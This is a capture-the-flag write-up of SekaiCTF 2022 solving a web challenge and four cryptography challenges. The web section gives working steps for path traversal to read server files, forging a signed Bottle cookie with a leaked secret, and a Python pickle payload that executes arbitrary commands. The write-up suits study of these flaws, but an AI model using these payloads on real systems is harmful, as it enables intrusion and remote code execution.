Writeup: SekaiCTF 2022

on nevi.dev

Bottle Poem (Web)

Come and read poems in the bottle.

No bruteforcing is required to solve this challenge. Please do not use scanner tools. Rate limiting is applied. Flag is executable on server.

Author: bwjy


Opening the link in a browser shows a simple index page with links to poems:

Opening any of them returns a simple text file with a poem. The URL seems suspicious, so let’s try reading arbitrary files:

$ curl http://bottle-poem.ctf.sekai.team/show?id=/etc/passwd

Great! But this doesn’t seem to be too useful on its own, no flag file is immediately available. It also seems to refuse to read executables like /bin/bash. The hint says that the flag is “executable”, which suggests we are supposed execute commands, not just read arbitrary files.

Moving on, let’s get some more details on the webserver process itself:

$ curl http://bottle-poem.ctf.sekai.team/show?id=/proc/self/cmdline -o- | tr \\0 \\n

$ curl http://bottle-poem.ctf.sekai.team/show?id=/app/app.py
from bottle import route, run, template, request, response, error
from config.secret import sekai
import os
import re

def home():
    return template("index")

def index():
    response.content_type = "text/plain; charset=UTF-8"
    param = request.query.id
    if re.search("^../app", param):
        return "No!!!!"
    requested_path = os.path.join(os.getcwd() + "/poems", param)
        with open(requested_path) as f:
            tfile = f.read()
    except Exception as e:
        return "No This Poems"
    return tfile

def error404(error):
    return template("error")

def index():
        session = request.get_cookie("name", secret=sekai)
        if not session or session["name"] == "guest":
            session = {"name": "guest"}
            response.set_cookie("name", session, secret=sekai)
            return template("guest", name=session["name"])
        if session["name"] == "admin":
            return template("admin", name=session["name"])
        return "pls no hax"

if __name__ == "__main__":
    run(host="", port=8080)

$ curl http://bottle-poem.ctf.sekai.team/show?id=/app/config/secret.py

We have a hidden endpoint at /sign, and we can easily forge signed cookies as we have obtained the signing secret already.

#!/usr/bin/env python3

from bottle import response

response.set_cookie('name', {'name': 'admin'}, secret="Se3333KKKKKKAAAAIIIIILLLLovVVVVV3333YYYYoooouuu")
print(f'Cookie: {response.headerlist[1][1]}')
# Cookie: name="!rsOwvUb6jllVHQVOPlZv5w==?gAWVFwAAAAAAAACMBG5hbWWUfZRoAIwFYWRtaW6Uc4aULg=="

$ curl http://bottle-poem.ctf.sekai.team/sign -H 'Cookie: name="!rsOwvUb6jllVHQVOPlZv5w==?gAWVFwAAAAAAAACMBG5hbWWUfZRoAIwFYWRtaW6Uc4aULg=="'
<!DOCTYPE html>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Sekai's boooootttttttlllllllleeeee</title>
    <script src="https://cdn.tailwindcss.com"></script>
<body class="text-white bg-zinc-800 container px-4 mx-auto text-center h-screen box-border flex justify-center item-center flex-col">
	Hello, you are admin, but it’s useless.

No dice. The documentation for the set_cookie method used above mentions that it can “store any pickle-able object”. Python pickles can encode arbitrary python values, and when used incorrectly (especially when decoding attacker-controled values), it can lead to arbitrary code execution.

We can now start setting up for arbitrary command execution:1

#!/usr/bin/env python3

from bottle import response
import sys

command = sys.argv[1]

class PickleRce(object):
    def __reduce__(self):
        import os
        return (os.system,(command,))

response.set_cookie('name', {'name': 'admin', 'v': PickleRce()}, secret="Se3333KKKKKKAAAAIIIIILLLLovVVVVV3333YYYYoooouuu")
print(f'Cookie: {response.headerlist[1][1]}')

$ time curl http://bottle-poem.ctf.sekai.team/sign -H "$(./sign.py 'sleep 5')" -o /dev/null

real	0m5.492s
user	0m0.095s
sys	0m0.036s

It works! While we can’t get our command outputs directly, we can redirect outputs to some file in /tmp and read them back afterwards with the /show endpoint.

$ curl http://bottle-poem.ctf.sekai.team/sign -H "$(./sign.py 'ls > /tmp/nevinevi')" -o /dev/null
$ curl http://bottle-poem.ctf.sekai.team/show?id=/tmp/nevinevi

there were multiple instances of this challenge running at any given time, so we had to repeat the read request multiple times in until it was routed to the same instance that we originally ran the command in.

I assume you could also set up a proper reverse shell, but I didn’t want to bother standing up infrastructure or opening ports on my end.

We now have the ability to execute arbitrary commands and read their outputs. We can now explore the filesystem and obtain the flag.

$ curl http://bottle-poem.ctf.sekai.team/sign -H "$(./sign.py 'find / > /tmp/nevinevi')" -o /dev/null
$ curl http://bottle-poem.ctf.sekai.team/show?id=/tmp/nevinevi | grep flag
$ curl http://bottle-poem.ctf.sekai.team/sign -H "$(./sign.py '/flag > /tmp/nevinevi')" -o /dev/null
$ curl http://bottle-poem.ctf.sekai.team/show?id=/tmp/nevinevi

Time Capsule (Cryptography)

I have encrypted a secret message with this super secure algorithm and put it into a Time Capsule. Maybe nobody can reveal my secret without a time machine…

Author: sahuang

chall.py flag.enc

We are given an encryption program and a ciphertext. The encryption program has two distinct phases that do not share state, so we will tackle each phase separately, in reverse order.

The second phase seems to be mainly an XOR cipher, with a keystream generated with random.randrange() seeded with the value of now = time.now() padded to 18 characters. The time is XORed with the constant 0x42 and is also appended to the ciphertext.

Since the random key generation seed is right there, we can recover it and rever this phase easily.

now = xor(data[-18:], 0x42)
enc = data[:-18]

key = [random.randrange(256) for _ in enc]
enc = xor(enc, key)

At this stage, the challenge ciphertext decrypts to 5!K3rn{T_5SA!}0ypC11uu__E__3j5LFI0Esr0m_1!1.

Next, we need to reverse the first phase. This phase generates an 8-byte random key and applies some encrypt_stage_one() function 42 times with that key.

The key generation function generates 8 random unique bytes. Then the encrypt_stage_one() function takes the key, orders it by value (but maintains the original index), and uses this index order to shuffle the message bytes around. That is, given some key like [13, 17, 8, 1, 2, 3, 4, 5], it results in indices like [(1, 3), (2, 4), (3, 5), (4, 6), (5, 7), (8, 2), (13, 0), (17, 1)]. It then looks at the original index i of each key to append the i[0]th, i[0]+8th, i[0]+16th character and so on, followed by the i[1]th, i[1]+8th, i[1]+16 character and so on.

As the second phase only cares about the relative order of the key, and not the actual values, the key space is not $256^8$, but actually much smaller, at $8! = 40320$. As the keyspace is small, we can brute force the key to obtain the flag.

def decrypt(message, key):
    size = len(message)
    out = [0] * size
    for i in key:
        for j in range(i, size, len(key)):
            out[j] = message[0]
            message = message[1:]
    return bytes(out)

for p in permutations(range(8)):
    dec = enc
    for _ in range(42):
        dec = decrypt(dec, p)
    if dec.startswith(b'SEKAI{'):
$ time ./solve.py
[*] dec: 5!K3rn{T_5SA!}0ypC11uu__E__3j5LFI0Esr0m_1!1
[+] brute: (6, 3, 7, 4, 2, 1, 0, 5)
[+] SEKAI{T1m3_15_pr3C10u5_s0_Enj0y_ur_L1F5!!!}

real    0m18.601s
user    0m18.467s
sys     0m0.147s


FaILProof (Cryptography)

I have designed a failproof encryption system with possibly arbitrarily small public keys. I will be as famous as Et Al one day, but only if I can somehow figure out a decryption mechanism…

Author: deut-erium

nc challs.ctf.sekai.team 3001


One of the first things we notice is that the challenge provides a server, intead of providing a single key-ciphertext pair, despite being entirely non-interactive. This will come in handy later.

This server first generates a 16-byte secret key, and SHA256s the secret key repeatedly to create a 128x256-bit public key. In other words,

$$ \mathrm{Pubkey} = \begin{pmatrix} \mathrm{SHA256}^{1}(\mathrm{secret}) \\ \vdots \\ \mathrm{SHA256}^{128}(\mathrm{secret}) \\ \end{pmatrix} $$

It then encrypts every 64-byte (256-bit) chunk of the message msg[i] independently using this public key. Encryption is performed by computing happiness(msg[i] & pubkey[i]) for each pubkey, where happiness is turns out to be popcount. That is,

$$ \mathrm{C}_{i,j} = \mathrm{popcnt}(\mathrm{Pubkey_j} \mathbin{\&} \mathrm{msg_i}) $$

This can be more concisely be written as

$$ \mathrm{C_i} = \mathrm{Pubkey} \times \mathrm{msg_i} $$

Since we need to find msg, this feels like a straightforward linear algebra problem, but we do not have enough information. Looking closely, we are only given 128 independent equations (public keys) but we have 256 unknowns (bits per message chunk).

To remedy this, we can just connect to the server twice, obtaining two sets 128 independent equations. We can then concatenate the public keys and ciphertexts and solve the system of equations to obtain the flag.

$$ \begin{pmatrix} \mathrm{C_{a,i}} \\ \mathrm{C_{b,i}} \\ \end{pmatrix} = \begin{pmatrix} \mathrm{Pubkey_a} \\ \mathrm{Pubkey_b} \\ \end{pmatrix} \times \mathrm{msg_i} $$

$ ./solve.sage
[+] Opening connection to challs.ctf.sekai.team on port 3001: Done
[*] Closed connection to challs.ctf.sekai.team port 3001
[+] Opening connection to challs.ctf.sekai.team on port 3001: Done
[*] Closed connection to challs.ctf.sekai.team port 3001
[+] SEKAI{w3ll_1_gu355_y0u_c4n_4lw4y5_4sk_f0r_m0r3_3qu4t10n5_wh3n_n0_0n3s_l00k1ng}


Secure Image Encryption (Cryptography)

I think this permutation-based image encryption scheme is so secure that nobody can read anything from it!

Author: Yanhu1 & sahuang



The webserver accepts two 256x256 images, converts them to grayscale, and applies the same encryption function to each image as well as the flag. The exact implementation of the encryption function is not provided, but according to a helfpul comment, it is purely permutation-only.

As the encryption is permutation-only, we could reverse the encryption if we could somehow obtain the original pixel position of every output pixel. We might be able to do this by creating an image where every pixel is a distinct color, keeping track of where each pixel went post-encryption to build a reverse mapping.

However, our images are converted to grayscale before being encrypted, so we only have 256 distinct colors we can use to build this reverse mapping when we need 256x256 distinct values. However, as the server conveniently encrypts two images for us, we can build the reverse mapping for the x and y coordinates separately.

That is, we generate two images like so: generate.go



Where the grayscale value of each pixel is its x or y coordinate value, respectively. Once we submit the above images, we obtain encryptions like the following:




Given the above, we can build a reverse-x map and reverse-y map from the first two images, eg. reverse_y[i, j] = horiz_encrypted[i, j] and reverse_x[i, j] = vert_encrypted[i, j]. Once we have built the two maps, we can apply the reverse mapping to the third image to obtain the flag.

$ go run solve.go horiz-enc.png vert-enc.png flag-enc.png > flag.png



Robust CBC (Cryptography)

RCBC is a secure MAC that is robust to all attacks. Try to break it!

Author: sahuang & Yanhu1

robust_cbc robust_cbc.go

I got 3rd solve on this problem! It might not be much, but it’s my first time being anywhere close to the first few people to solve any challenge, so I’m a bit proud.

The challenge implements something like CBC-MAC with Camellia as its block cipher, but with a few twists:

Unlike standard PKCS#7 padding, this challenge leaves correctly-sized messages as-is instead of adding a full block of padding. This might have allowed a trivial attack as "SEKAI" and "SEKAI" + [0x0b]*0x0b would result in the same final block, and thus the same MAC tag. This does not work, however, because the MAC tag is not the raw final block, but a truncation of the final block, and the unpadded-padded pair of messages would have selected distinct portions of the final block to truncate.

Similarly, we could have performed the usual message extension attack2 given two message-MAC pairs m1, c1, m2, c2, by setting m3 = m1 || xor(m2[:16], c1) || m2[16:], c3 = c2. However, because the state is truncated before being returned as the MAC, we do not know the full MAC state before it is returned to us as the MAC tag to perform this attack.

We can, however, obtain the majority of the final block’s bits by sending a unpadded-padded message pair. They both result in the same pre-truncation final block, and the server would provide us the upper and lower 63 bits of the final CBC block. No matter what we do, it seems impossible to obtain the middle two bits, but since there are only two unknown bits, we can guess their value and we will be right 1/4 of the time.

Once we have a guess for the final block’s value, we can query the oracle a third time with any arbitrary message to performt he length extension attack. More specifically, m1 = padded message; c1 = full block guess; m2 = third message; c2 = third message MAC; m3 = m1 || xor(m2[:16], c1) || m2[16:]; c3 = c2.

Since we are guessing two bits of the full intermediate block, we might have to try a few times before obtaining the flag.

$ ./solve.py
[+] Opening connection to challs.ctf.sekai.team on port 7000: Done
[*] Closed connection to challs.ctf.sekai.team port 7000
[+] Opening connection to challs.ctf.sekai.team on port 7000: Done
[+] Hmmm the scheme seems broken. Here is your flag: SEKAI{TrCBC_15_VuLn3r4bL3_70_len_4tt4cK}
[*] Closed connection to challs.ctf.sekai.team port 7000
